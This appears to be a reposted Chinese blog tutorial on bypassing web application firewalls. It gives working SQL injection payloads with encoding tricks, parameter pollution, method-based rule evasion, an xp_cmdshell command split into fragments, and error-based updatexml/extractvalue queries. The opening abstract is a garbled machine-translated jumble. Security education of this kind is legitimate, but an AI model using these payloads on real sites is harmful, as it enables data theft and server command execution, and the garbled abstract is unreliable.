黑客是怎样绕过WAF之三重防护绕过讲解

摘要:
Id=1un%u0069onsel%u0065ctpass%u0072omadminli%u006dit1.绕过1?id=1 and 1=1HTTP/1.1主机:www.cnseay。com接受语言:zh-cn,zh;q=0.8,en-us;q=0.5,en;Q=0.3接受编码:gzip,deflateConnection:keep alive 4.通过编码方法绕过解析阶段--1.绕过各种代码。2.绕过复杂参数。3.绕过特殊字符污染。4.绕过异常方法。5.绕过编码方法。6.绕过超大数据包。绕过数据包阻塞传输。绕过WAF规则策略阶段--规则网络1.绕过数据库特殊语法。1.MySQL。符号和~符号和!3.4 2.关键字拆分绕过xx。com/1.aspx?id=1;EXEC 3.请求方法差异规则不严格。绕过GET/id=1unionselect 1,2,3,4--拦截POSTid=1uninselect 1,2,4--绕过WAF服务限制。POST规则相对宽松。4.绕过1./1.php获取意外的函数/标签?

什么是WAF

Web Application Firewall

通过执行一系列针对HTTP/HTTPS的安全策略来防御对Web应用的攻击。

目前主要有单设备WAF与云WAF


WAF的现状

1.太多数WAF能够拦截较为普通的WEB攻击

2.大多数WAF没有针对热点漏洞奇葩攻击EXP防御的能力

3.基本所有的WAF都存在策略性绕过

4.由于waf的业务限制等各种原因导致存在通用绕过


黑客是怎样绕过WAF之三重防护绕过讲解第1张

WAF逻辑漏洞及白名单阶段的绕过

1.搜索引擎白名单(判断引擎方式不严)

2.IP段白名单绕过

3.目录白名单绕过

4.绕过代理直接请求源站(代理模式云WAF)

黑客是怎样绕过WAF之三重防护绕过讲解第2张

黑客是怎样绕过WAF之三重防护绕过讲解第3张

WAF数据包解析阶段的绕过(通用型绕过)

一、各种编码绕过

1.?id=1 union select pass from admin limit 1
  ?id=1%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%70%61%73%73%20%66%72%6f%6d%20%61%64%6d%69%6e%20%6c%69%6d%69%74%20%31

2.?id=1 union select pass from admin limit 1
  ?id=1 un%u0069on sel%u0065ct pass f%u0072om admin li%u006dit 1

二、复参数绕过

  1.?id=1 union select 1&id=pass from admin

三、异常Method绕过

Seay /1.php?id=1 and 1=1 HTTP/1.1
Host: www.cnseay.com
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive

四、编码方式绕过(urlencoded/mutipart)

黑客是怎样绕过WAF之三重防护绕过讲解第4张

解析阶段绕过--(最具杀伤力)

1.各种编码绕过

2.复参数绕过(依赖Server)

3.特殊字符污染绕过(截断/%/09-0d等)

4.异常Method绕过

5.编码方式绕过(urlencoded/from-data)

6.超大数据包绕过

7.数据包分块传输绕过

黑客是怎样绕过WAF之三重防护绕过讲解第5张

WAF规则策略阶段的绕过--规则网


一、数据库特殊语法绕过

1.mysql .符号和~符号和!符号以及+和-号连接

xx.php?id=1.union%0aselect@1,2 ,!3,4


二、关键字拆分绕过

xx.com/1.aspx?id=1;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')


三、请求方式差异规则松懈性绕过

GET /id=1 union select 1,2,3,4   ---拦截

POST id=1 union select 1,2,3,4   ---绕过

WAF业务限制,POST规则相对松懈


四、冷门函数/标签绕过

1. /1.php?id=1 and 1=(updatexml(1,concat(0x3a,(select user())),1))

2. /1.php?id=1 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));



WAF规则策略阶段的绕过总结

1.字母大小写转换

2.数据库特殊语法绕过

3.关键字拆分绕过

4.请求方式差异规则松懈性绕过

5.多URL伪静态绕过

6.白字符绕过

7.冷门函数/标签绕过

免责声明:文章转载自《黑客是怎样绕过WAF之三重防护绕过讲解》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇生产企业如何部署VMware虚拟化的解决方案如何区分APP内的原生还是H5下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Sql 递归查询

Sql 递归查询(给定节点查所有父节点、所有子节点的方法) --查找所有父节点 with tab as( select Type_Id,ParentId,Type_Name from Sys_ParamType_V2_0 where Type_Id=316--子节点 union all selectb.Type_Id,b.ParentId,b.Ty...

oracle中imp命令具体解释

oracle中imp命令具体解释 Oracle的导入有用程序(Import utility)同意从数据库提取数据,而且将数据写入操作系统文件。imp使用的基本格式:imp[username[/password[@service]]],下面例举imp经常使用用法。 1. 获取帮助 imp help=y 2. 导入一个完整数据库 imp syste...

MySQL 行锁 表锁机制

MySQL 表锁和行锁机制 行锁变表锁,是福还是坑?如果你不清楚MySQL加锁的原理,你会被它整的很惨!不知坑在何方?没事,我来给你们标记几个坑。遇到了可别乱踩。通过本章内容,带你学习MySQL的行锁,表锁,两种锁的优缺点,行锁变表锁的原因,以及开发中需要注意的事项。还在等啥?经验等你来拿! MySQL的存储引擎是从MyISAM到InnoDB,锁从表锁到行...

Oracle11g温习-第十一章:管理undo

2013年4月27日 星期六 10:40 1、undo tablespace 功能 undo tablespace 功能:用来存放从datafiles 读出的数据块旧的镜像 【 1) 回滚事务:rollback 2) 读一致性:正在做DML操作的数据块,在没有提交前,其他用户不能读,其他用户读undo里面的数据块信息 3) 事务的恢复:instan...

关于Web服务器的认识

       马上就要毕业了,也要开始找工作了,大学写了这么多代码了,却没有好好总结一下常用的概念很是遗憾额,就通过这篇博客记录一下我最常用的一些知识好了。        说到Web服务器,有很多文章都介绍的很好,之前看到一篇非常不错的,对我帮助很大,可惜现在找不到原文了,看到博客园有人转载,我就在这里也记一下好了,在此非常感谢作者的分析,受益匪浅。   ...

SQL优化(转)

1. 负向条件查询不能使用索引     select * from order where status!=0 and stauts!=1     not in/not exists都不是好习惯     可以优化为in查询:     select * from order where status in(2,3)  2. 前导模糊查询不能使用索引    ...